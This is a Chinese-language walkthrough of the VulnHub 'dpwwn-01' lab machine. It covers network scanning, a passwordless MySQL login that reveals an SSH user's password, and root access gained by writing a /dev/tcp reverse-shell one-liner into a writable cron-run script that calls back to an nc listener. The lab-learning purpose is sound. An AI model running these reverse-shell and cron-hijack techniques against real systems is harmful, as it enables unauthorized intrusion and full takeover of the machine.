环境配置
靶机下载地址:
https://download.vulnhub.com/dpwwn/dpwwn-01.zip
下载好解压打开.vmx文件即可
启动后如图:
无法直接获得靶机ip,用kali扫ip
netdiscover -r 192.168.164.0/16
ip信息:
kali:192.168.164.137
靶机:192.168.164.181
渗透测试
拿到靶机的ip后,进行端口扫描
nmap -sS -sV -T5 -A -p- 192.168.164.181
发现靶机开启22、80、3306这3个端口。
其中3306是数据库端口,尝试无密码连接试一下。
直接进入。
查找一下可用信息
看到ssh数据库中有用户表,其中有用户密码信息:
username:mistic
password:testP@$$swordmistic
将获得的信息尝试ssh连接
连接成功
查看不是root权限
尝试提权
发现/home/mistic/logrot.sh每3分钟执行一次
而且/home/mistic/logrot.sh具有写的权限
制作反弹shell脚本内容
并在kali攻击机上开启nc监听,nc -lvp 1234
在靶机上执行命令,制作反弹shell写入logrot.sh文件中
echo '0<&172-;exec 172<>/dev/tcp/192.168.164.137/1234;sh <&172 >&172 2>&172' > logrot.sh
把反弹shell脚本内容写入定时任务脚本文件,
接下来就是写一个定时任务,再开一个nc监听,把/bin/bash反弹回来,就可以获得root的shell了
等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。
进入root目录下,获取flag